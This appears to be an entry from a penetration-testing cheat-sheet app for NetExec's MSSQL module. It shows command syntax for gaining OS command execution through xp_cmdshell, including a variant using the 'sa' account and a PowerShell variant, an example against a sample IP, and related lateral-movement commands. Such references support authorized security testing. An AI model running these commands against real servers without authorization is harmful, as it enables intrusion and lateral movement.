NetExec MSSQL Command Exec
Execute OS commands through MSSQL — auto-enables xp_cmdshell if disabled and the account has sufficient privileges. The fastest path from sysadmin SQL login to RCE.
- Tool
- nxc
- Category
- Lateral Movement / MSSQL
- Platform
- linux
- Requires
- password
- Protocols
- MSSQL
Syntax
Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.
nxc mssql <target> -u '<user>' -p '<password>' -x '<command>'
Credential variants
The same attack using a different authentication material.
Local SQL Auth requires password
nxc mssql <target> -u 'sa' -p '<password>' --local-auth -x '<command>'
PowerShell requires password
nxc mssql <target> -u '<user>' -p '<password>' -X '<powershell>'
Examples
nxc mssql 10.10.10.10 -u sa -p 'Password123!' --local-auth -x whoami
Tags
Related commands
- Impacket MSSQLClient Interactive MSSQL shell for command execution and database access
- MSSQLPwner Linked Server Abuse Enumerate and abuse MSSQL linked servers for lateral movement
- NetExec MSSQL Enable CmdShell Enable xp_cmdshell on a MSSQL server for OS command execution
- NetExec MSSQL Linked Servers Enumerate MSSQL linked servers for lateral movement opportunities
- NetExec MSSQL Privilege Check Enumerate and escalate MSSQL server privileges (sysadmin, impersonation, linked servers)
- NetExec MSSQL xp_cmdshell Execute OS commands via MSSQL xp_cmdshell using NetExec